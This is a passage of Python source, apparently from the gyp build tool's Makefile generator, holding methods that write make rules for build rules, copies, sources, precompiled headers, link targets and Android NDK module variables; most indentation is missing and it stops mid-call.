def WriteRules(self, rules, extra_sources, extra_outputs, extra_mac_bundle_resources):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for rule in rules:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
rule['rule_name']))
count = 0
self.WriteLn('### Generated for rule %s:' % name)
all_outputs = []
for rule_source in rule.get('rule_sources', []):
dirs = set()
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
for out in outputs:
d = os.path.dirname(out)
if d:
dirs.add(d)
if int(rule.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(rule.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
inputs = map(Sourceify, map(self.Absolutify, [rule_source] +
rule.get('inputs', [])))
actions = ['$(call do_cmd,%s_%d)' % (name, count)]
if name == 'resources_grit':
# HACK: This is ugly. Grit intentionally doesn't touch the
# timestamp of its output file when the file doesn't change,
# which is fine in hash-based dependency systems like scons
# and forge, but not kosher in the make world. After some
# discussion, hacking around it here seems like the least
# amount of pain.
actions += ['@touch --no-create $@']
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
outputs = [self.Absolutify(o) for o in outputs]
all_outputs += outputs
# Only write the 'obj' and 'builddir' rules for the "primary" output
# (:1); it's superfluous for the "extra outputs", and this avoids
# accidentally writing duplicate dummy rules for those outputs.
self.WriteLn('%s: obj := $(abs_obj)' % outputs[0])
self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0])
self.WriteMakeRule(outputs, inputs, actions,
command="%s_%d" % (name, count))
# Spaces in rule filenames are not supported, but rule variables have
# spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)').
# The spaces within the variables are valid, so remove the variables
# before checking.
variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)')
for output in outputs:
output = re.sub(variables_with_spaces, '', output)
assert ' ' not in output, (
"Spaces in rule filenames not yet supported (%s)" % output)
self.WriteLn('all_deps += %s' % ' '.join(outputs))
action = [self.ExpandInputRoot(ac, rule_source_root,
rule_source_dirname)
for ac in rule['action']]
mkdirs = ''
if len(dirs) > 0:
mkdirs = 'mkdir -p %s; ' % ' '.join(dirs)
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# action, cd_action, and mkdirs get written to a toplevel variable
# called cmd_foo. Toplevel variables can't handle things that change
# per makefile like $(TARGET), so hardcode the target.
if self.flavor == 'mac':
action = [gyp.xcode_emulation.ExpandEnvVars(command, env)
for command in action]
action = gyp.common.EncodePOSIXShellList(action)
action = action.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
mkdirs = mkdirs.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the rule runs an executable from this
# build which links to shared libs from this build.
# rules run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn(
"cmd_%(name)s_%(count)d = LD_LIBRARY_PATH="
"$(builddir)/lib.host:$(builddir)/lib.target:$$LD_LIBRARY_PATH; "
"export LD_LIBRARY_PATH; "
"%(cd_action)s%(mkdirs)s%(action)s" % {
'action': action,
'cd_action': cd_action,
'count': count,
'mkdirs': mkdirs,
'name': name,
})
self.WriteLn(
'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % {
'count': count,
'name': name,
})
self.WriteLn()
count += 1
outputs_variable = 'rule_%s_outputs' % name
self.WriteList(all_outputs, outputs_variable)
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn('### Finished generating for rule: %s' % name)
self.WriteLn()
self.WriteLn('### Finished generating for all rules')
self.WriteLn('')
def WriteCopies(self, copies, extra_outputs, part_of_all):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Generated for copy rule.')
variable = StringToMakefileVariable(self.qualified_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# Absolutify() may call normpath, and will strip trailing slashes.
path = Sourceify(self.Absolutify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.Absolutify(os.path.join(copy['destination'],
filename)))
# If the output path has variables in it, which happens in practice for
# 'copies', writing the environment as target-local doesn't work,
# because the variables are already needed for the target name.
# Copying the environment variables into global make variables doesn't
# work either, because then the .d files will potentially contain spaces
# after variable expansion, and .d file handling cannot handle spaces.
# As a workaround, manually expand variables at gyp time. Since 'copies'
# can't run scripts, there's no need to write the env then.
# WriteDoCmd() will escape spaces for .d files.
env = self.GetSortedXcodeEnv()
output = gyp.xcode_emulation.ExpandEnvVars(output, env)
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
self.WriteDoCmd([output], [path], 'copy', part_of_all)
outputs.append(output)
self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
def WriteMacBundleResources(self, resources, bundle_deps):
"""Writes Makefile code for 'mac_bundle_resources'."""
self.WriteLn('### Generated for mac_bundle_resources')
product_dir = generator_default_variables['PRODUCT_DIR']
sources = map(Sourceify, map(self.Absolutify, resources))
bundle_resources = gyp.xcode_emulation.GetMacBundleResources(product_dir, self.xcode_settings, sources)
for output, res in bundle_resources:
_, ext = os.path.splitext(output)
      # TODO(refack): actually figure this out for `copy-bundle-resource`
# is_binary = xcode_emulation.IsBinaryOutputFormat(output)
if ext != '.xcassets':
        # Make does not support '.xcassets' emulation.
self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource', part_of_all=True)
bundle_deps.append(output)
def WriteMacInfoPlist(self, bundle_deps):
"""Write Makefile code for bundle Info.plist files."""
info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
lambda p: Sourceify(self.Absolutify(p)))
if not info_plist:
return
if defines:
# Create an intermediate file to store preprocessed results.
intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' + os.path.basename(info_plist))
self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D', quoter=EscapeCppDefine)
self.WriteMakeRule([intermediate_plist], [info_plist],
['$(call do_cmd,infoplist)',
# "Convert" the plist so that any weird whitespace changes from the
# preprocessor do not affect the XML parser in mac_tool.
'@plutil -convert xml1 $@ $@'])
info_plist = intermediate_plist
    # plists can contain envvars; write the env so they get substituted into the file.
self.WriteSortedXcodeEnv(out, self.GetSortedXcodeEnv(additional_settings=extra_env))
self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist', part_of_all=True)
bundle_deps.append(out)
def WriteSources(self, configs, deps, sources, extra_outputs, extra_link_deps, precompiled_header):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
configs, deps, sources: input from gyp.
extra_outputs: a list of extra outputs this action should be dependent on;
used to serialize action/rules before compilation
extra_link_deps: a list that will be filled in with any outputs of
compilation (to be used in link lines)
part_of_all: flag indicating this target is part of 'all'
"""
# Write configuration-specific variables for CFLAGS, etc.
for configname in sorted(configs.keys()):
config = configs[configname]
self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D', quoter=EscapeCppDefine)
if self.flavor == 'mac':
cflags = self.xcode_settings.GetCflags(configname)
cflags_c = self.xcode_settings.GetCflagsC(configname)
cflags_cc = self.xcode_settings.GetCflagsCC(configname)
cflags_objc = self.xcode_settings.GetCflagsObjC(configname)
cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname)
else:
cflags = config.get('cflags')
cflags_c = config.get('cflags_c')
cflags_cc = config.get('cflags_cc')
cflags_objc = None
cflags_objcc = None
self.WriteLn("# Flags passed to all source files.")
self.WriteList(cflags, 'CFLAGS_%s' % configname)
self.WriteLn("# Flags passed to only C files.")
self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname)
self.WriteLn("# Flags passed to only C++ files.")
self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname)
if self.flavor == 'mac':
self.WriteLn("# Flags passed to only ObjC files.")
self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname)
self.WriteLn("# Flags passed to only ObjC++ files.")
self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname)
includes = config.get('include_dirs')
if includes:
includes = [Sourceify(self.Absolutify(include)) for include in includes]
self.WriteList(includes, 'INCS_%s' % configname, prefix='-I')
    compilable = list(filter(Compilable, sources))
objs = [self.Objectify(self.Absolutify(Target(x))) for x in compilable]
self.WriteList(objs, 'OBJS')
for obj in objs:
assert ' ' not in obj, (
"Spaces in object filenames not supported (%s)" % obj)
self.WriteLn('# Add to the list of files we specially track '
'dependencies for.')
self.WriteLn('all_deps += $(OBJS)')
self.WriteLn()
# Make sure our dependencies are built first.
if deps:
self.WriteMakeRule(['$(OBJS)'], deps,
comment='Make sure our dependencies are built before any of us.',
order_only=True)
# Make sure the actions and rules run first.
# If they generate any extra headers etc., the per-.o file dep tracking
# will catch the proper rebuilds, so order only is still ok here.
if extra_outputs:
self.WriteMakeRule(['$(OBJS)'], extra_outputs,
comment='Make sure our actions/rules run before any of us.',
order_only=True)
pchdeps = precompiled_header.GetObjDependencies(compilable, objs)
if pchdeps:
self.WriteLn('# Dependencies from obj files to their precompiled headers')
for source, obj, gch in pchdeps:
self.WriteLn('%s: %s' % (obj, gch))
self.WriteLn('# End precompiled header dependencies')
if objs:
extra_link_deps.append('$(OBJS)')
self.WriteLn("""\
# CFLAGS et al overrides must be target-local.
# See "Target-specific Variable Values" in the GNU Make manual.""")
self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)")
self.WriteLn("$(OBJS): GYP_CFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('c') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_CXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('cc') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE))")
if self.flavor == 'mac':
self.WriteLn("$(OBJS): GYP_OBJCFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('m') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE)) "
"$(CFLAGS_OBJC_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('mm') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE)) "
"$(CFLAGS_OBJCC_$(BUILDTYPE))")
self.WritePchTargets(precompiled_header.GetPchBuildCommands())
# If there are any object files in our input file list, link them into our
# output.
extra_link_deps += [source for source in sources if Linkable(source)]
self.WriteLn()
def WritePchTargets(self, pch_commands):
"""Writes make rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, inpt in pch_commands:
extra_flags = {
'c': '$(CFLAGS_C_$(BUILDTYPE))',
'cc': '$(CFLAGS_CC_$(BUILDTYPE))',
'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))',
'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))',
}[lang]
var_name = {
'c': 'GYP_PCH_CFLAGS',
'cc': 'GYP_PCH_CXXFLAGS',
'm': 'GYP_PCH_OBJCFLAGS',
'mm': 'GYP_PCH_OBJCXXFLAGS',
}[lang]
self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) +
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"$(CFLAGS_$(BUILDTYPE)) " +
extra_flags)
self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, inpt))
self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang)
self.WriteLn('')
assert ' ' not in gch, (
"Spaces in gch filenames not supported (%s)" % gch)
self.WriteLn('all_deps += %s' % gch)
self.WriteLn('')
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
assert not self.is_mac_bundle
if self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
return self.xcode_settings.GetExecutablePath()
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.a'
elif self.type in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
if self.flavor == 'aix':
target_ext = '.a'
else:
target_ext = '.so'
elif self.type == 'none':
target = '%s.stamp' % target
elif self.type != 'executable':
print(("ERROR: What output file should be generated?",
"type", self.type, "target", target))
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
return target_prefix + target + target_ext
def _InstallImmediately(self):
return self.toolset == 'target' and self.flavor == 'mac' and self.type in ('static_library', 'executable', 'shared_library', 'loadable_module')
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
assert not self.is_mac_bundle
path = os.path.join('$(obj).' + self.toolset, self.path)
if self.type == 'executable' or self._InstallImmediately():
path = '$(builddir)'
path = spec.get('product_dir', path)
return os.path.join(path, self.ComputeOutputBasename(spec))
def ComputeMacBundleOutput(self):
"""Return the 'output' (full output path) to a bundle output directory."""
assert self.is_mac_bundle
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetWrapperName())
def ComputeMacBundleBinaryOutput(self):
"""Return the 'output' (full output path) to the binary in a bundle."""
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetExecutablePath())
@staticmethod
def ComputeDeps(spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
# TODO: It seems we need to transitively link in libraries (e.g. -lfoo)?
# This hack makes it work:
# link_deps.extend(spec.get('libraries', []))
return gyp.common.uniquer(deps), gyp.common.uniquer(link_deps)
def WriteDependencyOnExtraOutputs(self, extra_outputs):
self.WriteMakeRule([self.output_binary], extra_outputs, comment='Build our special outputs first.', order_only=True)
def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps, extra_outputs, part_of_all):
"""
Write Makefile code to produce the final target of the gyp spec.
spec: input from gyp.
configs: input from gyp.
deps: dependency lists; see ComputeDeps()
link_deps: dependency lists; see ComputeDeps()
extra_outputs: any extra outputs that our target should depend on
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Rules for final target.')
if extra_outputs:
self.WriteDependencyOnExtraOutputs(extra_outputs)
self.WriteMakeRule(extra_outputs, deps, comment='Preserve order dependency of special output on deps.', order_only=True)
target_postbuilds = {}
if self.type != 'none':
for configname in sorted(configs.keys()):
config = configs[configname]
if self.flavor == 'mac':
ldflags = self.xcode_settings.GetLdflags(configname,
generator_default_variables['PRODUCT_DIR'],
lambda p: Sourceify(self.Absolutify(p)))
# TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on.
gyp_to_build = gyp.common.InvertRelativePath(self.path)
target_postbuild = self.xcode_settings.AddImplicitPostbuilds(
configname,
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output))),
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output_binary))))
if target_postbuild:
target_postbuilds[configname] = target_postbuild
else:
ldflags = config.get('ldflags', [])
# Compute an rpath for this output if needed.
if any(dep.endswith('.so') or '.so.' in dep for dep in deps):
# We want to get the literal string "$ORIGIN" into the link command,
# so we need lots of escaping.
ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset)
ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' %
self.toolset)
library_dirs = config.get('library_dirs', [])
ldflags += [('-L%s' % library_dir) for library_dir in library_dirs]
self.WriteList(ldflags, 'LDFLAGS_%s' % configname)
if self.flavor == 'mac':
self.WriteList(self.xcode_settings.GetLibtoolflags(configname),
'LIBTOOLFLAGS_%s' % configname)
libraries = spec.get('libraries')
if libraries:
# Remove duplicate entries
libraries = gyp.common.uniquer(libraries)
if self.flavor == 'mac':
libraries = self.xcode_settings.AdjustLibraries(libraries)
self.WriteList(libraries, 'LIBS')
self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary))
if self.flavor == 'mac':
self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
# Postbuild actions. Like actions, but implicitly depend on the target's
# output.
postbuilds = []
if self.flavor == 'mac':
if target_postbuilds:
postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))')
postbuilds.extend(gyp.xcode_emulation.GetSpecPostbuildCommands(spec))
if postbuilds:
# Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE),
# so we must output its definition first, since we declare variables
# using ":=".
self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv())
for configname in target_postbuilds:
self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' % (QuoteSpaces(self.output), configname, gyp.common.EncodePOSIXShellList(target_postbuilds[configname])))
# Postbuilds expect to be run in the gyp file's directory, so insert an
# implicit postbuild to cd to there.
postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path]))
for i, postbuild in enumerate(postbuilds):
if not postbuild.startswith('$'):
postbuilds[i] = EscapeShellArgument(postbuild)
self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output))
self.WriteLn('%s: POSTBUILDS := %s' % (
QuoteSpaces(self.output), ' '.join(postbuilds)))
# A bundle directory depends on its dependencies such as bundle resources
# and bundle binary. When all dependencies have been built, the bundle
# needs to be packaged.
if self.is_mac_bundle:
# If the framework doesn't contain a binary, then nothing depends
# on the actions -- make the framework depend on them directly too.
self.WriteDependencyOnExtraOutputs(extra_outputs)
# Bundle dependencies. Note that the code below adds actions to this
# target, so if you move these two lines, move the lines below as well.
self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS')
self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output))
# After the framework is built, package it. Needs to happen before
# postbuilds, since postbuilds depend on this.
if self.type in ('shared_library', 'loadable_module'):
self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' % self.xcode_settings.GetFrameworkVersion())
# Bundle postbuilds can depend on the whole bundle, so run them after
      # the bundle is packaged, not merely after the bundle binary is built.
if postbuilds:
self.WriteLn('\t@$(call do_postbuilds)')
postbuilds = [] # Don't write postbuilds for target's output.
# Needed by test/mac/gyptest-rebuild.py.
self.WriteLn('\t@true # No-op, used by tests')
# Since this target depends on binary and resources which are in
# nested subfolders, the framework directory will be older than
# its dependencies usually. To prevent this rule from executing
      # on every build (expensive, especially with postbuilds), explicitly
# update the time on the framework directory.
self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output))
if postbuilds:
assert not self.is_mac_bundle, ('Postbuilds for bundles should be done on the bundle, not the binary (target \'%s\')' % self.target)
assert 'product_dir' not in spec, 'Postbuilds do not work with custom product_dir'
if self.type == 'executable':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'link_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all, postbuilds=postbuilds)
elif self.type == 'static_library':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in alink input filenames not supported (%s)" % link_dep)
if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not
self.is_standalone_static_library):
self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all, postbuilds=postbuilds)
elif self.type == 'shared_library':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all, postbuilds=postbuilds)
elif self.type == 'loadable_module':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in module input filenames not supported (%s)" % link_dep)
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module', part_of_all, postbuilds=postbuilds)
elif self.type == 'none':
# Write a stamp line.
self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all, postbuilds=postbuilds)
else:
print("WARNING: no output for", self.type, self.target)
# Add an alias for each target (if there are any outputs).
# Installable target aliases are created below.
if ((self.output and self.output != self.target) and
(self.type not in self._INSTALLABLE_TARGETS)):
self.WriteMakeRule([self.target], [self.output], comment='Add target alias', phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [self.target], comment='Add target alias to "all" target.', phony=True)
# Add special-case rules for our installable targets.
# 1) They need to install to the build dir or "product" dir.
# 2) They get shortcuts for building (e.g. "make chrome").
# 3) They are part of "make all".
if (self.type in self._INSTALLABLE_TARGETS or
self.is_standalone_static_library):
if self.type == 'shared_library':
file_desc = 'shared library'
elif self.type == 'static_library':
file_desc = 'static library'
else:
file_desc = 'executable'
install_path = self._InstallableTargetInstallPath()
installable_deps = [self.output]
      if (self.flavor == 'mac' and 'product_dir' not in spec and
self.toolset == 'target'):
# On mac, products are created in install_path immediately.
assert install_path == self.output, '%s != %s' % (install_path, self.output)
# Point the target alias to the final binary output.
self.WriteMakeRule([self.target], [install_path],
comment='Add target alias', phony=True)
if install_path != self.output:
assert not self.is_mac_bundle # See comment a few lines above.
self.WriteDoCmd([install_path], [self.output], 'copy', comment='Copy this to the %s output path.' % file_desc, part_of_all=part_of_all)
installable_deps.append(install_path)
if self.output != self.alias and self.alias != self.target:
self.WriteMakeRule([self.alias], installable_deps, comment='Short alias for building this %s.' % file_desc, phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [install_path], comment='Add %s to "all" target.' % file_desc, phony=True)
def WriteList(self, value_list, variable=None, prefix='', quoter=QuoteIfNecessary):
"""
Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
# TODO(refack) `part_of_all` is not used, but is part of signature used in many other places
# noinspection PyUnusedLocal
def WriteDoCmd(self, outputs, inputs, command, part_of_all=False, comment=None, postbuilds=None):
"""
Write a Makefile rule that uses do_cmd.
This makes the outputs dependent on the command line that was run,
as well as support the V= make command line flag.
"""
suffix = ''
if postbuilds:
assert ',' not in command
suffix = ',,1' # Tell do_cmd to honor $POSTBUILDS
self.WriteMakeRule(
outputs,
inputs,
actions=['$(call do_cmd,%s%s)' % (command, suffix)],
comment=comment,
command=command,
force=True
)
# Add our outputs to the list of targets we read depfiles from.
# all_deps is only used for deps file reading, and for deps files we replace
# spaces with ? because escaping doesn't work with make's $(sort) and
# other functions.
outputs = [QuoteSpaces(o, SPACE_REPLACEMENT) for o in outputs]
self.WriteLn('all_deps += %s' % ' '.join(outputs))
def WriteMakeRule(self, outputs, inputs, actions=None, comment=None, order_only=False, force=False, phony=False, command=None):
"""
Write a Makefile rule, with some extra tricks.
outputs: a list of outputs for the rule (note: this is not directly
supported by make; see comments below)
inputs: a list of inputs for the rule
actions: a list of shell commands to run for the rule
comment: a comment to put in the Makefile above the rule (also useful
for making this Python script's code self-documenting)
order_only: if true, makes the dependency order-only
force: if true, include FORCE_DO_CMD as an order-only dep
phony: if true, the rule does not actually generate the named output, the
output is just a name to run the rule
command: (optional) command name to generate unambiguous labels
"""
outputs = [QuoteSpaces(o) for o in outputs]
inputs = map(QuoteSpaces, inputs)
if comment:
self.WriteLn('# ' + comment)
if phony:
self.WriteLn('.PHONY: ' + ' '.join(outputs))
if actions:
self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0])
force_append = ' FORCE_DO_CMD' if force else ''
if order_only:
# Order only rule: Just write a simple rule.
# TODO(evanm): just make order_only a list of deps instead of this hack.
self.WriteLn('%s: | %s%s' % (' '.join(outputs), ' '.join(inputs), force_append))
elif len(outputs) == 1:
# Regular rule, one output: Just write a simple rule.
self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append))
else:
# Regular rule, more than one output: Multiple outputs are tricky in make. We will write three rules:
# - All outputs depend on an intermediate file.
# - Make .INTERMEDIATE depend on the intermediate.
# - The intermediate file depends on the inputs and executes the actual command.
# - The intermediate recipe will 'touch' the intermediate file.
# - The multi-output rule will have a do-nothing recipe.
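      # For illustration, with outputs "out1 out2" the generated rules look
      # roughly like this (the digest and slug values are made up):
      #
      #   out1 out2: <sha1>.<slug>.intermediate
      #           @:
      #   .INTERMEDIATE: <sha1>.<slug>.intermediate
      #   <sha1>.<slug>.intermediate: input1 input2 FORCE_DO_CMD
      #           $(call do_cmd,touch)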
# Hash the target name to avoid generating overlong filenames.
      key = command if command else self.target
      slug = re.sub(r'\W', '', key)
      cmddigest = hashlib.sha1(key.encode('utf-8')).hexdigest()
intermediate = "%s.%s.intermediate" % (cmddigest, slug)
self.WriteLn('%s: %s' % (' '.join(outputs), intermediate))
self.WriteLn('\t%s' % '@:')
self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate))
self.WriteLn('%s: %s%s' % (intermediate, ' '.join(inputs), force_append))
actions.insert(0, '$(call do_cmd,touch)')
if actions:
for action in actions:
self.WriteLn('\t%s' % action)
self.WriteLn()
def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps):
"""Write a set of LOCAL_XXX definitions for Android NDK.
These variable definitions will be used by Android NDK but do nothing for
non-Android applications.
Arguments:
module_name: Android NDK module name, which must be unique among all
module names.
all_sources: A list of source files (will be filtered by Compilable).
link_deps: A list of link dependencies, which must be sorted in
the order from dependencies to dependents.
"""
if self.type not in ('executable', 'shared_library', 'static_library'):
return
self.WriteLn('# Variable definitions for Android applications')
self.WriteLn('include $(CLEAR_VARS)')
self.WriteLn('LOCAL_MODULE := ' + module_name)
self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) '
'$(DEFS_$(BUILDTYPE)) '
# LOCAL_CFLAGS is applied to both of C and C++. There is
# no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C
# sources.
'$(CFLAGS_C_$(BUILDTYPE)) '
# $(INCS_$(BUILDTYPE)) includes the prefix '-I' while
# LOCAL_C_INCLUDES does not expect it. So put it in
# LOCAL_CFLAGS.
'$(INCS_$(BUILDTYPE))')
# LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred.
self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))')
self.WriteLn('LOCAL_C_INCLUDES :=')
self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)')
# Detect the C++ extension.
cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0}
default_cpp_ext = '.cpp'
for filename in all_sources:
ext = os.path.splitext(filename)[1]
if ext in cpp_ext:
cpp_ext[ext] += 1
if cpp_ext[ext] > cpp_ext[default_cpp_ext]:
default_cpp_ext = ext
self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext)
self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)),
'LOCAL_SRC_FILES')
# Filter out those which do not match prefix and suffix and produce
# the resulting list without prefix and suffix.
def DepsToModules(deps, prefix, suffix):
modules = []
for filepath in deps:
mod_filename = os.path.basename(filepath)
if mod_filename.startswith(prefix) and mod_filename.endswith(suffix):
modules.append(mod_filename[len(prefix):-len(suffix)])
return modules
# Retrieve the default value of 'SHARED_LIB_SUFFIX'
params = {'flavor': 'linux'}
default_variables = {}
CalculateVariables(default_variables, params)
self.WriteList(
DepsToModules(link_deps, generator_default_variables['SHARED_LIB_PREFIX'], default_variables['SHARED_LIB_SUFFIX']),
